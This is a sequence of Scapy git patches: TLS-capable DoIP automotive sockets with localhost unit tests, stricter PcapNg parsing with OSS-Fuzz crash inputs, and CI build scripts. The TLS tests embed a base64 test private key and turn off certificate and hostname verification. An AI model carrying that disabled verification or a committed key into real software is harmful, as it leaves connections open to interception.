DoIPSocket6("2001:16b8:3f0e:2f00:21a:37ff:febf:edb9") @@ -369,22 +460,38 @@ class DoIPSocket6(DoIPSocket): >>> pkt = DoIP(payload_type=0x8001, source_address=0xe80, target_address=0x1000) / UDS() / UDS_RDBI(identifiers=[0x1000]) >>> resp = socket.sr1(pkt, timeout=1) """ # noqa: E501 - def __init__(self, ip='::1', port=13400, activate_routing=True, - source_address=0xe80, target_address=0, - activation_type=0, reserved_oem=b""): - # type: (str, int, bool, int, int, int, bytes) -> None + + def __init__(self, + ip='::1', # type: str + port=13400, # type: int + tls_port=3496, # type: int + activate_routing=True, # type: bool + source_address=0xe80, # type: int + target_address=0, # type: int + activation_type=0, # type: int + reserved_oem=b"", # type: bytes + force_tls=False, # type: bool + context=None # type: Optional[ssl.SSLContext] + ): # type: (...) -> None self.ip = ip self.port = port + self.tls_port = tls_port + self.activate_routing = activate_routing self.source_address = source_address + self.target_address = target_address + self.activation_type = activation_type + self.reserved_oem = reserved_oem self.buffer = b"" - super(DoIPSocket6, self)._init_socket(socket.AF_INET6) - - if activate_routing: - super(DoIPSocket6, self)._activate_routing( - source_address, target_address, activation_type, reserved_oem) + self.force_tls = force_tls + self.context = context + try: + self._init_socket(socket.AF_INET6) + except Exception: + self.close() + raise -class UDS_DoIPSocket(DoIPSocket): +class _UDS_DoIPSocketBase(StreamSocket): """ Application-Layer socket for DoIP endpoints. This socket takes care about the encapsulation of UDS packets into DoIP packets. @@ -394,11 +501,14 @@ class UDS_DoIPSocket(DoIPSocket): >>> pkt = UDS() / UDS_RDBI(identifiers=[0x1000]) >>> resp = socket.sr1(pkt, timeout=1) """ + def send(self, x): # type: (Union[Packet, bytes]) -> int if isinstance(x, UDS): - pkt = DoIP(payload_type=0x8001, source_address=self.source_address, - target_address=self.target_address) / x + pkt = DoIP(payload_type=0x8001, + source_address=self.source_address, # type: ignore + target_address=self.target_address # type: ignore + ) / x else: pkt = x @@ -407,35 +517,38 @@ def send(self, x): except AttributeError: pass - return super(UDS_DoIPSocket, self).send(pkt) + return super().send(pkt) def recv(self, x=MTU, **kwargs): # type: (Optional[int], **Any) -> Optional[Packet] - pkt = super(UDS_DoIPSocket, self).recv(x, **kwargs) + pkt = super().recv(x, **kwargs) if pkt and pkt.payload_type == 0x8001: return pkt.payload else: return pkt -class UDS_DoIPSocket6(DoIPSocket6, UDS_DoIPSocket): +class UDS_DoIPSocket(_UDS_DoIPSocketBase, DoIPSocket): """ Application-Layer socket for DoIP endpoints. This socket takes care about the encapsulation of UDS packets into DoIP packets. Example: - >>> socket = UDS_DoIPSocket6("2001:16b8:3f0e:2f00:21a:37ff:febf:edb9") + >>> socket = UDS_DoIPSocket("169.254.117.238") >>> pkt = UDS() / UDS_RDBI(identifiers=[0x1000]) >>> resp = socket.sr1(pkt, timeout=1) """ pass -bind_bottom_up(UDP, DoIP, sport=13400) -bind_bottom_up(UDP, DoIP, dport=13400) -bind_layers(UDP, DoIP, sport=13400, dport=13400) - -bind_layers(TCP, DoIP, sport=13400) -bind_layers(TCP, DoIP, dport=13400) +class UDS_DoIPSocket6(_UDS_DoIPSocketBase, DoIPSocket6): + """ + Application-Layer socket for DoIP endpoints. This socket takes care about + the encapsulation of UDS packets into DoIP packets. -bind_layers(DoIP, UDS, payload_type=0x8001) + Example: + >>> socket = UDS_DoIPSocket6("2001:16b8:3f0e:2f00:21a:37ff:febf:edb9") + >>> pkt = UDS() / UDS_RDBI(identifiers=[0x1000]) + >>> resp = socket.sr1(pkt, timeout=1) + """ + pass diff --git a/test/contrib/automotive/doip.uts b/test/contrib/automotive/doip.uts index 51f8d5e7364..74d095162ad 100644 --- a/test/contrib/automotive/doip.uts +++ b/test/contrib/automotive/doip.uts @@ -381,6 +381,13 @@ assert req.hashret() == resp.hashret() assert resp[3].answers(req[3]) assert not req[3].answers(resp[3]) ++ DoIP Communication tests + += Load libraries +import base64 +import ssl +import tempfile + = Test DoIPSocket ~ automotive_comm @@ -407,8 +414,75 @@ server_up.wait(timeout=1) sock = DoIPSocket(activate_routing=False) pkts = sock.sniff(timeout=1, count=2) +server_thread.join(timeout=1) +assert len(pkts) == 2 + + += Test DoIPSocket 2 +~ automotive_comm + +server_up = threading.Event() +def server(): + buffer = b'\x02\xfd\x80\x02\x00\x00\x00\x05\x00\x00\x00\x00\x00\x02\xfd\x80\x01\x00\x00\x00\n\x10\x10\x0e\x80P\x03\x002\x01\xf4' + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.bind(('127.0.0.1', 13400)) + sock.listen(1) + server_up.set() + connection, address = sock.accept() + for i in range(len(buffer)): + connection.send(buffer[i:i+1]) + time.sleep(0.01) + connection.close() + finally: + sock.close() + + +server_thread = threading.Thread(target=server) +server_thread.start() +server_up.wait(timeout=1) +sock = DoIPSocket(activate_routing=False) + +pkts = sock.sniff(timeout=1, count=2) +server_thread.join(timeout=1) +assert len(pkts) == 2 + += Test DoIPSocket 3 +~ automotive_comm + +server_up = threading.Event() +def server(): + buffer = b'\x02\xfd\x80\x02\x00\x00\x00\x05\x00\x00\x00\x00\x00\x02\xfd\x80\x01\x00\x00\x00\n\x10\x10\x0e\x80P\x03\x002\x01\xf4' + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.bind(('127.0.0.1', 13400)) + sock.listen(1) + server_up.set() + connection, address = sock.accept() + while buffer: + randlen = random.randint(0, len(buffer)) + connection.send(buffer[:randlen]) + buffer = buffer[randlen:] + time.sleep(0.01) + connection.close() + finally: + sock.close() + + +server_thread = threading.Thread(target=server) +server_thread.start() +server_up.wait(timeout=1) +sock = DoIPSocket(activate_routing=False) + +pkts = sock.sniff(timeout=1, count=2) +server_thread.join(timeout=1) assert len(pkts) == 2 + = Test DoIPSocket6 ~ automotive_comm @@ -435,4 +509,243 @@ server_up.wait(timeout=1) sock = DoIPSocket6(activate_routing=False) pkts = sock.sniff(timeout=1, count=2) +server_thread.join(timeout=1) +assert len(pkts) == 2 + += Test DoIPSslSocket +~ automotive_comm + +certstring = """ +LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2QUlCQURBTkJna3Foa2lHOXcwQkFRRUZB +QVNDQktZd2dnU2lBZ0VBQW9JQkFRRFUvK0hRbVpzSDl2QVcKQ3ZMQjRxalpnZFJSSXE1b2JBanB4 +YUhoUGxCVEMvUlBzMHIxRVF0V0FtbXNEZFE3UGlLaCtYa1hES3pNY3lJSQp1a0ZpNThUQW1idGFj +N0U5VmJHSnNlTWp2RkJKSkFqQXVtbFdRZk5XcSs2TkZhdmRkTDQrSTNBTVJ5TldJTkJYCjhHMzRo +dldIbDdTOGhhSFFZN0FXcUZWVTNVL2xKR2pubnF3MEJraEIvVGRCTWIwM0habzkrVjIrWU9RZmk5 +QWsKTVRSRXpSeWVObWJqT0sxbHpXdFJXWkZZU0RnMEtqUVh4SkdFNVc5MzFPWitHL1NkbytTM1ZW +SVRPdWxQbHRmVwpXMEdjeCsvZERSNFIxNG5mcUl5L1daMElHUVNXMlRsQytmeGJ0dURDUkFqelRz +b0J3YjJ0cnpoR0VtYVFveUtNCnpBKzVSUHNyQWdNQkFBRUNnZ0VBRUJHaEoyWm5OVHh5YVY5TnZY +QjI1NDNZQnRUMGVSUHBhanJLMXg0bk1OU3oKNE9LNFVzWlo1MnBnTHRHT1EzZm1aS0l0cEo1WlY1 +cVBUejdwN3VjUzhnQWNZUnNJUnpCMHA5d3FpWExMK3h0RApxUjB4dnR4VDJpUGlFblVNNndudHpr +SHpKK0g0QkZLT2FvdjNaK3Fha2E1UmFCcmhheGRuaDBDNklLQmZtM3cyCm5zUWI2N0lCYWwrSnBs +L1g5TENWRkdRT2owb0lmVWI5ZFp3OWQ3MCthSGVVb2xvMGdYZmxxcXFFcnl3ZDlPN2QKNnp4dGlx +cnRyZUJhK1IraWs3NE1SK0xvaFNVR3o2VTRQaXhWQ3l1SnQ2U0hvRHR2L3dtSnltWDd2a0FRS2w1 +RQplK1JqUGVyakpUWTNzNXNXbEd2V21UTEtEbnVyS2pBYzZUOHhKb0pXWlFLQmdRRHdsd2RRdmww +S28wNHhDUmtiCklYRGVJZE1jZkp2ejRGZEtka1BmVnZVT2xHVEpNZkRzbWNoUzZhcEJCQUdQMUU2 +VkN2VzJmUFdjaXhScHE3MW8KR2xtbWZ5RnlJRW0rL08yamMvSFRXWHp6Qjdoc0JISEltQklHczFU +TC9iWFU3amhVQW5kWDdMK3RSRDBKNWRGVwpiN1VOOXNxaWdtRG42REJWZkxaUHgxRnlWUUtCZ1FE +aXBIT1BhNmVMSlk5R1FZdkw3OTIyTHNoU3ZYSUFVMERGCjBabTlqbjM2b3ZIY0kvWEZDdHVXank2 +WG9wbk9pbjlycmtUY2FDUnBvSEFNb00ycHdiR0tFY0dVVEY2RHQ3akYKRHVnd2srR21sbDkrbjM2 +M3Iwb09YNktSbWFhRStiZHoyNjNQVEhMaktYUnFyc3h5WEtMT3ZyTXhVNWNzMXJCeQpTMWI2ZGhr +M2Z3S0JnRjlONUliMnNkS3ArQ3B5aVRCM0ljZk1yRjBuZTN1ekRjRWdjaWlCd05lQ3J4NElHNEVP +Ck5nMnFKRmhXNXV0NzFaa3kyenpyNlR1VzJJSTNsdk1ySlFKUWNBWk9oZ2dURjJ2ZFhSazA1TXM4 +N3JCVFhtTncKNGdzbmROck42UDZ0VTBEc0xTeDJTME91dVdNM1Y2S2U0NkRoZDBuQ3pmSnZ4dDNH +WmszYURnaDFBb0dBWFhIcQpoNDZlZEx1V3VDUGNUTWhvUkc1RGdBSEdHQ1k3UlpTbTY4WHRZVUov +c0FGUG10OWdMRko2cG1DUFE5NU1yUXdjCkxqZnVFM0xuMy8wSTd0NENvbWV4eGNBN0U5blRIOFNH +clVpN3QrQzJITklNQUJZUTFaNU91L042K2Nhd0FkL28KYU5rZllWTzlRU015L2svOWZIcWFEVk5t +dUVFSVhRZDlKQ1UvUG1jQ2dZQWI0RTBRWTdDZmlrV293OFIzSlhoZgo0MHFVVkdud09QKzJNbXE5 +d2ZmWkpTRHNFSTQvb2g0VGRnN0sybHNNazVsWnRaMyszTjljSDVUc1pMYlJtd2FMCm9sRVl6K1BB +WU91MlMrY1l2bFlNL0V2WmlpRHJybjZuTStNbTNnaXJPYkNwMzcxd1ZxRFVsUnB4OUlwWVdYcnAK +T3YxUXFHdXkwODdyQkk1cStWL3hqQT09Ci0tLS0tRU5EIFBSSVZBVEUgS0VZLS0tLS0KLS0tLS1C +RUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUQ3VENDQXRXZ0F3SUJBZ0lVVTNsendsTVNSa294Tkdk +SFJzZllIcUtxcDAwd0RRWUpLb1pJaHZjTkFRRUwKQlFBd2dZVXhDekFKQmdOVkJBWVRBa1JGTVJN +d0VRWURWUVFJREFwVGIyMWxMVk4wWVhSbE1Rd3dDZ1lEVlFRSApEQU5TUlVjeEVUQVBCZ05WQkFv +TUNHUnBjM05sWTNSdk1Rd3dDZ1lEVlFRTERBTkVSVll4RFRBTEJnTlZCQU1NCkJGUkZVMVF4SXpB +aEJna3Foa2lHOXcwQkNRRVdGR052Ym5SaFkzUXRkWE5BWkdsemMyVmpMblJ2TUI0WERUSTAKTURN +eE9ERTVNek13TlZvWERUSTBNRFF4TnpFNU16TXdOVm93Z1lVeEN6QUpCZ05WQkFZVEFrUkZNUk13 +RVFZRApWUVFJREFwVGIyMWxMVk4wWVhSbE1Rd3dDZ1lEVlFRSERBTlNSVWN4RVRBUEJnTlZCQW9N +Q0dScGMzTmxZM1J2Ck1Rd3dDZ1lEVlFRTERBTkVSVll4RFRBTEJnTlZCQU1NQkZSRlUxUXhJekFo +QmdrcWhraUc5dzBCQ1FFV0ZHTnYKYm5SaFkzUXRkWE5BWkdsemMyVmpMblJ2TUlJQklqQU5CZ2tx +aGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQwpBUUVBMVAvaDBKbWJCL2J3RmdyeXdlS28yWUhV +VVNLdWFHd0k2Y1doNFQ1UVV3djBUN05LOVJFTFZnSnByQTNVCk96NGlvZmw1Rnd5c3pITWlDTHBC +WXVmRXdKbTdXbk94UFZXeGliSGpJN3hRU1NRSXdMcHBWa0h6VnF2dWpSV3IKM1hTK1BpTndERWNq +VmlEUVYvQnQrSWIxaDVlMHZJV2gwR093RnFoVlZOMVA1U1JvNTU2c05BWklRZjAzUVRHOQpOeDJh +UGZsZHZtRGtINHZRSkRFMFJNMGNualptNHppdFpjMXJVVm1SV0VnNE5DbzBGOFNSaE9WdmQ5VG1m +aHYwCm5hUGt0MVZTRXpycFQ1YlgxbHRCbk1mdjNRMGVFZGVKMzZpTXYxbWRDQmtFbHRrNVF2bjhX +N2Jnd2tRSTgwN0sKQWNHOXJhODRSaEpta0tNaWpNd1B1VVQ3S3dJREFRQUJvMU13VVRBZEJnTlZI +UTRFRmdRVVZhbUFkUjR1ZW8zQgpmV0RjUlMyUkQ3OEtlZXd3SHdZRFZSMGpCQmd3Rm9BVVZhbUFk +UjR1ZW8zQmZXRGNSUzJSRDc4S2Vld3dEd1lEClZSMFRBUUgvQkFVd0F3RUIvekFOQmdrcWhraUc5 +dzBCQVFzRkFBT0NBUUVBRjE1TTNvL3RyUVdYeHdHamlxZjgKNXBUTEM0bHJwQkZaTFZDbStQdHd4 +aENlN1ZSd2dLMElBb01EMW0vSjNEYnVJSjVURXlTVElnR2N0WHVNbG5pWgpsY3IwekZOZVVhQ08w +YkdhaExYUXpCWTRxSkhTTUNWNnhiNXNqUDlEdk9HYnFxbHVTbk51ZFJ5UWNIbkd4SE0rCk1adXpO +WUNseklOMEtYbFJuSTZqRXUrcG9XZ0pEMGN1NFM2b1lwT2R3bElRYmtaNnIrUE1jQ3hpRmhRd3E2 +em4KcE1nQzB0WlpSM3pCOEpVcTJwRHlGVy9jVlFjWkp5YUhnQkkwWlJWWG5wbDFqYng2YlNIOCts +cnMxVk1xZDlkcQozd1BMcjBheWI2VkpNa29WMjNWSXAzLzlYQVpTR3Z6Y0dadnM2VThSUTdFbUtx +akJibWxudm1CTkpUMk9xbFFRCllRPT0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo=""" + +certstring = certstring.replace('\n', '') + +def _load_certificate_chain(context) -> None: + with tempfile.NamedTemporaryFile(delete=False) as fp: + fp.write(base64.b64decode(certstring)) + fp.close() + context.load_cert_chain(fp.name) + + +server_up = threading.Event() +def server(): + context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) + _load_certificate_chain(context) + context.check_hostname = False + context.verify_mode = ssl.CERT_NONE + buffer = b'\x02\xfd\x80\x02\x00\x00\x00\x05\x00\x00\x00\x00\x00\x02\xfd\x80\x01\x00\x00\x00\n\x10\x10\x0e\x80P\x03\x002\x01\xf4' + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + ssock = context.wrap_socket(sock) + try: + ssock.bind(('127.0.0.1', 3496)) + ssock.listen(1) + server_up.set() + connection, address = ssock.accept() + connection.send(buffer) + connection.close() + finally: + ssock.close() + + +server_thread = threading.Thread(target=server) +server_thread.start() +server_up.wait(timeout=1) +context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) +context.check_hostname = False +context.verify_mode = ssl.CERT_NONE +sock = DoIPSocket(activate_routing=False, force_tls=True, context=context) + +pkts = sock.sniff(timeout=1, count=2) +server_thread.join(timeout=1) +assert len(pkts) == 2 + += Test DoIPSslSocket6 +~ automotive_comm + +server_up = threading.Event() +def server(): + context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) + _load_certificate_chain(context) + context.check_hostname = False + context.verify_mode = ssl.CERT_NONE + buffer = b'\x02\xfd\x80\x02\x00\x00\x00\x05\x00\x00\x00\x00\x00\x02\xfd\x80\x01\x00\x00\x00\n\x10\x10\x0e\x80P\x03\x002\x01\xf4' + sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + ssock = context.wrap_socket(sock) + try: + ssock.bind(('::1', 3496)) + ssock.listen(1) + server_up.set() + connection, address = ssock.accept() + connection.send(buffer) + connection.close() + finally: + ssock.close() + + +server_thread = threading.Thread(target=server) +server_thread.start() +server_up.wait(timeout=1) +context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) +context.check_hostname = False +context.verify_mode = ssl.CERT_NONE +sock = DoIPSocket6(activate_routing=False, force_tls=True, context=context) + +pkts = sock.sniff(timeout=1, count=2) +server_thread.join(timeout=1) +assert len(pkts) == 2 + += Test UDS_DoIPSslSocket6 +~ automotive_comm + +server_up = threading.Event() +def server(): + context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) + _load_certificate_chain(context) + context.check_hostname = False + context.verify_mode = ssl.CERT_NONE + buffer = b'\x02\xfd\x80\x02\x00\x00\x00\x05\x00\x00\x00\x00\x00\x02\xfd\x80\x01\x00\x00\x00\n\x10\x10\x0e\x80P\x03\x002\x01\xf4' + sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + ssock = context.wrap_socket(sock) + try: + ssock.bind(('::1', 3496)) + ssock.listen(1) + server_up.set() + connection, address = ssock.accept() + connection.send(buffer) + connection.close() + finally: + ssock.close() + + +server_thread = threading.Thread(target=server) +server_thread.start() +server_up.wait(timeout=1) +context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) +context.check_hostname = False +context.verify_mode = ssl.CERT_NONE +sock = UDS_DoIPSocket6(activate_routing=False, force_tls=True, context=context) + +pkts = sock.sniff(timeout=1, count=2) +server_thread.join(timeout=1) assert len(pkts) == 2 + += Test UDS_DualDoIPSslSocket6 +~ automotive_comm + +server_tcp_up = threading.Event() +server_tls_up = threading.Event() +def server_tls(): + context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) + _load_certificate_chain(context) + context.check_hostname = False + context.verify_mode = ssl.CERT_NONE + buffer = bytes.fromhex("02fd0006000000090e8011061000000000") + buffer += b'\x02\xfd\x80\x02\x00\x00\x00\x05\x00\x00\x00\x00\x00\x02\xfd\x80\x01\x00\x00\x00\n\x10\x10\x0e\x80P\x03\x002\x01\xf4' + sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + ssock = context.wrap_socket(sock) + try: + ssock.bind(('::1', 3496)) + ssock.listen(1) + server_tls_up.set() + connection, address = ssock.accept() + connection.send(buffer) + connection.close() + finally: + ssock.close() + +def server_tcp(): + buffer = bytes.fromhex("02fd0006000000090e8011060700000000") + sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) + try: + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.bind(('::1', 13400)) + sock.listen(1) + server_tcp_up.set() + connection, address = sock.accept() + connection.send(buffer) + connection.shutdown() + connection.close() + finally: + sock.close() + + +server_tcp_thread = threading.Thread(target=server_tcp) +server_tcp_thread.start() +server_tcp_up.wait(timeout=1) +server_tls_thread = threading.Thread(target=server_tls) +server_tls_thread.start() +server_tls_up.wait(timeout=1) +context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) +context.check_hostname = False +context.verify_mode = ssl.CERT_NONE + + +sock = UDS_DoIPSocket6(ip="::1", context=context) + +pkts = sock.sniff(timeout=1, count=2) +server_tcp_thread.join(timeout=1) +server_tls_thread.join(timeout=1) +assert len(pkts) == 2 \ No newline at end of file From 0d7b148d1dcd570d6bf0e4dbf6113999bb1fbeb5 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 8 May 2024 12:23:27 +0200 Subject: [PATCH 1272/1632] Checks added to PcapNg processing (#4373) * Check added to PcapNg processing * Unit tests --- scapy/utils.py | 48 ++++++++++++++++++++++++++++++++++----------- test/regression.uts | 13 ++++++++++++ 2 files changed, 50 insertions(+), 11 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index 33933c83bec..c6624c87660 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1603,9 +1603,14 @@ def _read_block(self, size=MTU): warning("PcapNg: Error reading blocklen before block body") raise EOFError if blocklen < 12: - warning("Invalid block length !") + warning("PcapNg: Invalid block length !") raise EOFError - block = self.f.read(blocklen - 12) + + _block_body_length = blocklen - 12 + block = self.f.read(_block_body_length) + if len(block) != _block_body_length: + raise Scapy_Exception("PcapNg: Invalid Block body length " + "(too short)") self._read_block_tail(blocklen) if blocktype in self.blocktypes: return self.blocktypes[blocktype](block, size) @@ -1635,25 +1640,41 @@ def _read_block_shb(self): elif endian == b"\x4d\x3c\x2b\x1a": self.endian = "<" else: - warning("Bad magic in Section Header block (not a pcapng file?)") + warning("PcapNg: Bad magic in Section Header Block" + " (not a pcapng file?)") raise EOFError - blocklen = struct.unpack(self.endian + "I", _blocklen)[0] + try: + blocklen = struct.unpack(self.endian + "I", _blocklen)[0] + except struct.error: + warning("PcapNg: Could not read blocklen") + raise EOFError if blocklen < 28: - warning(f"Invalid SHB block length ({blocklen})!") + warning(f"PcapNg: Invalid Section Header Block length ({blocklen})!") # noqa: E501 raise EOFError # Major version must be 1 _major = self.f.read(2) - major = struct.unpack(self.endian + "H", _major)[0] + try: + major = struct.unpack(self.endian + "H", _major)[0] + except struct.error: + warning("PcapNg: Could not read major value") + raise EOFError if major != 1: - warning(f"SHB Major version {major} unsupported !") + warning(f"PcapNg: SHB Major version {major} unsupported !") raise EOFError # Skip minor version & section length - self.f.read(10) + skipped = self.f.read(10) + if len(skipped) != 10: + warning("PcapNg: Could not read minor value & section length") + raise EOFError - options = self.f.read(blocklen - 28) + _options_len = blocklen - 28 + options = self.f.read(_options_len) + if len(options) != _options_len: + raise Scapy_Exception("PcapNg: Invalid Section Header Block " + " options (too short)") self._read_block_tail(blocklen) self._read_options(options) @@ -1673,7 +1694,12 @@ def _read_options(self, options): # type: (bytes) -> Dict[int, bytes] opts = dict() while len(options) >= 4: - code, length = struct.unpack(self.endian + "HH", options[:4]) + try: + code, length = struct.unpack(self.endian + "HH", options[:4]) + except struct.error: + warning("PcapNg: options header is too small " + "%d !" % len(options)) + raise EOFError if code != 0 and 4 + length < len(options): opts[code] = options[4:4 + length] if code == 0: @@ -1910,7 +1936,7 @@ def read_packet(self, size=MTU, **kwargs): p.comment = comment p.direction = direction if ifname is not None: - p.sniffed_on = ifname.decode('utf-8') + p.sniffed_on = ifname.decode('utf-8', 'backslashreplace') return p def recv(self, size: int = MTU, **kwargs: Any) -> 'Packet': # type: ignore diff --git a/test/regression.uts b/test/regression.uts index 189f3f60de8..868409a32ee 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2252,6 +2252,19 @@ for i in range(len(plist)): assert type(plist_check[i]) == type(plist[0]) assert bytes(plist_check[i]) == bytes(plist[i]) += OSS-Fuzz Findings + +from io import BytesIO +# Issue 68352 +file = BytesIO(b"\n\r\r\n\x1c\x00\x00\x00M<+\x1a\x01\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x1c\x00\x00\x00\x01\x00\x00\x00\x14\x00\x00\x00\xe4\x00\x00\x00\x00\x00\x04\x00\x14\x00\x00\x00\x01\x00\x00\x00(\x00\x00\x00\xe4\x00\x00\x00\x00\x00\x04\x00\x02\x00\t\x00b'ens16\xb0'\x00\x00\x00\x00\x00\x00\x00(\x00\x00\x00\x06\x00\x00\x004\x00\x00\x00\x01\x00\x00\x00}\x17\x06\x00\xb5t\x1d\x85\x14\x00\x00\x00\x14\x00\x00\x00E\x00\x00\x14\x00\x01\x00\x00@\x00|\xe7\x7f\x00\x00\x01\x7f\x00\x00\x014\x00\x00\x00") +rdpcap(file) +# Issue 68354 +file = BytesIO(b'\n\r\r\n\xff\xfe\xfe\xffM<+\x1a') +try: + rdpcap(file) +except Scapy_Exception: + pass + = Read a pcap file with wirelen != captured len pktpcapwirelen = rdpcap(pcapwirelenfile) From 9dcee453a846874bd4fd0810e76d735f1ba76fa7 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 9 May 2024 14:32:09 +0200 Subject: [PATCH 1273/1632] Disable flaky unit test on OSX (#4379) * Fix #4375: Disable flaky unit test on OSX * cleanup --- test/contrib/automotive/doip.uts | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) diff --git a/test/contrib/automotive/doip.uts b/test/contrib/automotive/doip.uts index 74d095162ad..3a2bb91c8cd 100644 --- a/test/contrib/automotive/doip.uts +++ b/test/contrib/automotive/doip.uts @@ -389,7 +389,6 @@ import ssl import tempfile = Test DoIPSocket -~ automotive_comm server_up = threading.Event() def server(): @@ -419,7 +418,7 @@ assert len(pkts) == 2 = Test DoIPSocket 2 -~ automotive_comm +~ linux server_up = threading.Event() def server(): @@ -450,7 +449,6 @@ server_thread.join(timeout=1) assert len(pkts) == 2 = Test DoIPSocket 3 -~ automotive_comm server_up = threading.Event() def server(): @@ -484,7 +482,6 @@ assert len(pkts) == 2 = Test DoIPSocket6 -~ automotive_comm server_up = threading.Event() def server(): @@ -513,7 +510,6 @@ server_thread.join(timeout=1) assert len(pkts) == 2 = Test DoIPSslSocket -~ automotive_comm certstring = """ LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2QUlCQURBTkJna3Foa2lHOXcwQkFRRUZB @@ -616,7 +612,6 @@ server_thread.join(timeout=1) assert len(pkts) == 2 = Test DoIPSslSocket6 -~ automotive_comm server_up = threading.Event() def server(): @@ -653,7 +648,6 @@ server_thread.join(timeout=1) assert len(pkts) == 2 = Test UDS_DoIPSslSocket6 -~ automotive_comm server_up = threading.Event() def server(): @@ -690,7 +684,6 @@ server_thread.join(timeout=1) assert len(pkts) == 2 = Test UDS_DualDoIPSslSocket6 -~ automotive_comm server_tcp_up = threading.Event() server_tls_up = threading.Event() From 29b5413f102bda8796f52e78c19adb8d23f4cdee Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 11 May 2024 16:04:41 +0200 Subject: [PATCH 1274/1632] Minor improvements to build & ci (#4382) --- .config/ci/install.sh | 4 +++ .config/ci/openssl.py | 2 ++ .config/ci/test.sh | 4 +++ .config/ci/zipapp.sh | 68 +++++++++++++++++++++++++++++++++++++++++++ pyproject.toml | 7 ++--- scapy/__init__.py | 2 +- scapy/main.py | 5 ++-- 7 files changed, 84 insertions(+), 8 deletions(-) create mode 100644 .config/ci/zipapp.sh diff --git a/.config/ci/install.sh b/.config/ci/install.sh index b4f4daa32c0..bd21565896b 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -1,5 +1,9 @@ #!/bin/bash +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + # Usage: # ./install.sh [install mode] diff --git a/.config/ci/openssl.py b/.config/ci/openssl.py index 07857d20c9a..58baa138c76 100755 --- a/.config/ci/openssl.py +++ b/.config/ci/openssl.py @@ -1,4 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) Gabriel Potter """ diff --git a/.config/ci/test.sh b/.config/ci/test.sh index 67adfe82c98..f6d58f5d150 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -1,5 +1,9 @@ #!/bin/bash +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + # test.sh # Usage: # ./test.sh [tox version] [both/root/non_root (default root)] diff --git a/.config/ci/zipapp.sh b/.config/ci/zipapp.sh new file mode 100644 index 00000000000..5f7497597b5 --- /dev/null +++ b/.config/ci/zipapp.sh @@ -0,0 +1,68 @@ +#!/bin/bash + +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + +# Build a zipapp for Scapy + +DIR=$(realpath "$(dirname "$0")/../../") +cd $DIR + +if [ ! -e "pyproject.toml" ]; then + echo "zipapp.sh must be called from scapy root folder" + exit 1 +fi + +if [ -z "$PYTHON" ] +then + PYTHON=${PYTHON:-python3} +fi + +# Get temp directory +TMPFLD="$(mktemp -d)" +if [ -z "$TMPFLD" ] || [ ! -d "$TMPFLD" ]; then + echo "Error: 'mktemp -d' failed" + exit 1 +fi +ARCH="$TMPFLD/archive" +SCPY="$TMPFLD/scapy" +mkdir "$ARCH" +mkdir "$SCPY" + +# Create git archive +git archive HEAD -o "$ARCH/scapy.tar.gz" + +# Unpack the archive to a temporary directory +if [ ! -e "$ARCH/scapy.tar.gz" ]; then + echo "ERROR: git archive failed" + exit 1 +fi +tar -xvf "$ARCH/scapy.tar.gz" -C "$SCPY" + +# Remove unnecessary files +cd "$SCPY" && find . -not \( \ + -wholename "./scapy*" -o \ + -wholename "./pyproject.toml" -o \ + -wholename "./LICENSE" \ +\) -print +cd $DIR + +# Get DEST file 